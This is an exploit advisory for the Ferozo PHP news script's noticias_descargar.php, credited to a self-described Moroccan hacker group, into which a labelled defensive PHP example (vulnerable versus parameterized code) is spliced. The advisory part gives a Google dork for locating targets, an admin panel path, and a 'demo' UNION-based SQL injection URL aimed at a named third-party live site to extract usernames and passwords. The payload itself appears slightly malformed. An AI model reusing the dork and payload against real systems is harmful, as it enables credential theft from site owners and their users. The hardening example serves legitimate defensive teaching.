
Ferozo - SQL Injection and Cross-Site Scripting

Author: Casper Moroccan , Published: 13-04-2014
# Exploit Title: Ferozo - SQL Injection and Cross-Site Scripting
# Google Dork: inurl:/noticias_descargar.php
# Date: 12/04/2014
# Contact: FB /1Mr.Casper
# Exploit Author: Casper Moroccan ( CM )
# Vendor Homepage: http://www.ferozo.net/
# Tested on: Windows7, Linux

Vulnerable code in file noticias_descargar.php
Description: The $_GET parameter 'id' is not filtered, so an attacker
can inject malicious MySQL code.
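The following is an added illustration, not Ferozo's own code: the first handler shows the pattern the advisory describes (the raw `$_GET['id']` concatenated into the query and the result echoed unescaped, which is what makes both the SQL injection and the reflected XSS possible), and the second shows the hardened form. The table name `noticias`, the columns `titulo` and `archivo`, and the PDO DSN are assumptions.

```php
<?php
// Added example (not the vendor's code). Table and column names are assumed.

// --- Vulnerable pattern described in the advisory: the GET value goes
// --- straight into the SQL string, and the fetched values are echoed raw.
function vulnerableHandler(PDO $db): string
{
    $id  = $_GET['id'];                                              // unfiltered input
    $sql = "SELECT titulo, archivo FROM noticias WHERE id = $id";    // injection point
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    // Unescaped output: whatever the query returned lands in the page as HTML.
    return "<a href=\"{$row['archivo']}\">{$row['titulo']}</a>";
}

// --- Hardened version: validate the type, bind the parameter, escape output.
function hardenedHandler(PDO $db): string
{
    // FILTER_VALIDATE_INT returns false for non-integers and null when absent.
    $id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1]]);
    if ($id === false || $id === null) {
        http_response_code(400);
        return 'invalid id';
    }

    // Prepared statement: the value is sent separately from the SQL text,
    // so it can never change the structure of the query.
    $stmt = $db->prepare('SELECT titulo, archivo FROM noticias WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        http_response_code(404);
        return 'not found';
    }

    // Output encoding closes the XSS side even if the stored data is tainted.
    $esc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="' . $esc($row['archivo']) . '">' . $esc($row['titulo']) . '</a>';
}

// Usage (assumed DSN and credentials):
// $db = new PDO('mysql:host=localhost;dbname=ferozo;charset=utf8mb4', 'user', 'pass', [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
// ]);
// echo hardenedHandler($db);
```

Disabling emulated prepares matters with the MySQL driver: with emulation on, PDO interpolates the bound values client-side, so the query text still reaches the server as a single string. Binding with `PDO::PARAM_INT` after `FILTER_VALIDATE_INT` means a value such as `-35 union select ...` is rejected before any query runs, and `htmlspecialchars` on the way out covers the cross-site scripting half of the advisory regardless of what the database holds.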

Example:

SQL Injection & Cross-Site Scripting


http://localhost/noticias_descargar.php?id=[SQL INJECTION] and [Cross-Site Scripting]

Demo:

http://www.terrainmobiliaria.com.ar/noticias_descargar.php?id=-35+union+select+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15+union+select+group_concat(nick,0x3a,password)29,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+usuarios

Panel:
http://localhost/noticias/login.php




#############################################################
# Greetz TO ; Me & Wassim Rel ( Moroccan Hackers )
# & All My Friends And All Member Of Arab Ghosts Team
#############################################################
# fb.com/Arab.ghosts.page
#############################################################
